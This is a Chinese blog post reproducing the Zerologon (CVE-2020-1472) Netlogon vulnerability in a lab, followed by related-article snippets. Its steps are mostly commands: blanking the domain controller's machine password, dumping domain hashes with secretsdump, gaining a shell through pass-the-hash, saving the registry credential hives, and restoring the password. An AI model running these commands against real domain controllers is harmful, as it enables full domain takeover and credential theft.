CVE 2020-1472 Netlogon 特权提升漏洞

最新推荐文章于 2024-07-02 16:25:16 发布
最新推荐文章于 2024-07-02 16:25:16 发布
阅读量312 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/BROTHERYY/article/details/108951274
版权
该博客详细介绍了CVE 2020-1472 Netlogon特权提升漏洞的复现过程,包括复现环境、影响版本、复现步骤如漏洞验证、利用方法(下载攻击exp、置空密码、获取hash等)以及修复建议。内容涉及Windows 2012 Server DC和Kali攻击机的配置,使用了Impacket工具进行漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.复现环境

DC:
os:windows 2012 server
ip:192.168.236.132

攻击机:
os:kali
ip:192.168.236.130

2.影响版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控环境搭建参考文章

4.复现过程

4.1 漏洞验证

POC链接

在这里插入图片描述
在这里插入图片描述

4.2 漏洞利用

安装最新的Impacket,否则会报错
在这里插入图片描述

4.2.1 下载攻击exp

EXP下载
在这里插入图片描述

4.2.2 置空密码
python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

在这里插入图片描述

4.2.3 获取hash

进入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

在这里插入图片描述

4.2.4 获取shell
python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

在这里插入图片描述

4.2.5 获取原hash
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

在这里插入图片描述

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

4.2.7 恢复hash

恢复链接
也可以直接
git clone https://github.com/risksense/zerologon

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

在这里插入图片描述

4.2.8 验证是否恢复

使用获取hash的命令来验证是否恢复

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

在这里插入图片描述

5.修复建议

修复建议

CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 506
模拟环境:获取了一个加入了域的计算机权限,在system账号权限的情况下,将域管密码置空,导出域管hash,然后进行连接
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7273
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472 NetLogon 权限提升漏洞
梅花寺
08-10 924
Key对其进行AES加密,得到的结果中的第一个字节与8字节的明文input(其实就是Challenge)的第一个字节进行异或运算,将异或的结果放在IV末尾,IV整体向前移一个字节,得到新的IV。(2)重置域控Hash确定目标域控存在NetLogon权限提升,使用CVE-2020-1472.py脚本执行如下命令对其攻击:python3 cve-2020-1472-exploit.py DC 192.168.41.10结果如图所示,该脚本会将目标域控的机器账户的Hash置空,可以看到攻击成功。
(域渗透提权)CVE-2020-1472 NetLogon权限提升漏洞
最新发布
m0_64481831的博客
07-02 666
CVE-2020-1472是继永恒之蓝漏洞之后又一个好用的内网提权漏洞,影响Windows Server2008R2至2019的版本。只要攻击者能够访问到目标域控并且知道域控计算机名即可利用该漏洞。该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows,该漏洞的稳定利用方式为重置目标域控的密码,然后利用域控凭证进行DC Sync获取域管权限后修复域控密码。漏洞利用过程中会重置域控存储在域中的凭证,而域控存储在域中的凭证域本地的注册表中的凭证不一致时,会导致目标域控脱域,所以在。
CVE-2020-1472: NetLogon特权提升漏洞通告
荒野求生的博客
11-07 574
1. CVE-2020-1472简要分析 阅读量 102057| 分享到: https://www.anquanke.com/post/id/217475 发布时间:2020-09-16 14:30:51 漏洞简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(...
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
NetLogon特权提升漏洞CVE-2020-1472)复现
玄道的网安博客
09-15 2613
简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Window..
Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证
smellycat000的专栏
09-16 1453
聚焦源代码安全,网罗国内外最新资讯!漏洞简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的...
Netlogon特权提升漏洞
m0_48520508的博客
09-18 623
0x01 漏洞概要 2020年8月11日,Microsoft公司发布安全公告,公布了Netlogon 特权提升漏洞CVE-2020-1472)的相关信息。12日起,各大安全研究团队纷纷对该漏洞作出漏洞通告。 下图是某厂对该漏洞的影响力的一份评估: 0x02 漏洞详情 NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 当攻击者使用 Netlogon 远程协
hackthebox- Froest (考点:Kerberos pre-authentication/win-rm&5985/域渗透)
冬萍子癸水
04-17 3213
nullinux rpcclient -U "" -N 10.10.10.161 enumdomusers gem install evil-winrm 科普
本地计算机上的netlogon服务启动后停止_微软NetLogon权限提升 CVE20201472 漏洞复现...
weixin_39963744的博客
12-01 1419
文末原文链接可直达博客简介NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认证以及更新计算机域密码微软MSRC于8月11日 发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472, CVSS 评分:10.0。由 Secu...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9459
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
Netlogon特权提升漏洞 (CVE-2020-1472)
总有人间一两风,填我十万八千梦
03-18 5001
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问域控的135端口即可通过 NetLogon 远程协议连接域控并重置域控机器的Hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限)。该漏洞存在的原因是Netlogon协议中加密模块存在问题,导致攻击者能够在没有有效凭据的情况下通过身份认证。
CVE-2020-1472 NetLogon特权提升漏洞 复现
mukami0621的博客
09-15 5110
CVE-2020-1472漏洞复现 用了大半天时间,开局一张图,复现全靠蒙: 参考宽字节安全的推文:https://mp.weixin.qq.com/s/MSLbzg2hCoTSVTtEIxxpNQ 1、搭建一个windows的域环境 参考:https://blog.csdn.net/wwl012345/article/details/88934571 发现电脑里有一个win2008r2的虚拟机,就用这个了 更改随意IP和DNS 添加角色 根据提示,运行dcpromo.exe添加DNS服务器 记录域
NetLogon特权提升漏洞CVE-2020-1472)复现及问题解决
热门推荐
Love&Share
09-17 1万+
NetLogon特权提升漏洞CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
CVE-2020-1472(zero-logon)
include_heqile的博客
11-22 402
https://mp.weixin.qq.com/s/BZ_-ud67FpUgkP48GCtBUA
利用ZeroLogon漏洞接管域控权限
Zlirving_的博客
02-25 2559
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
CVE-2020-1472 域内提权
网络安全。
09-16 6326
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
CVE-2020-1337 Windows特权提升漏洞Poc分析
在本例中,cve-2020-1337-poc 是一个PoC工具,它演示了如何利用CVE-2020-1337漏洞进行特权提升。通过这个PoC,研究人员可以验证漏洞的存在,并进一步研究该漏洞的利用方式,以便开发相应的防御策略和修复措施。 ###...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值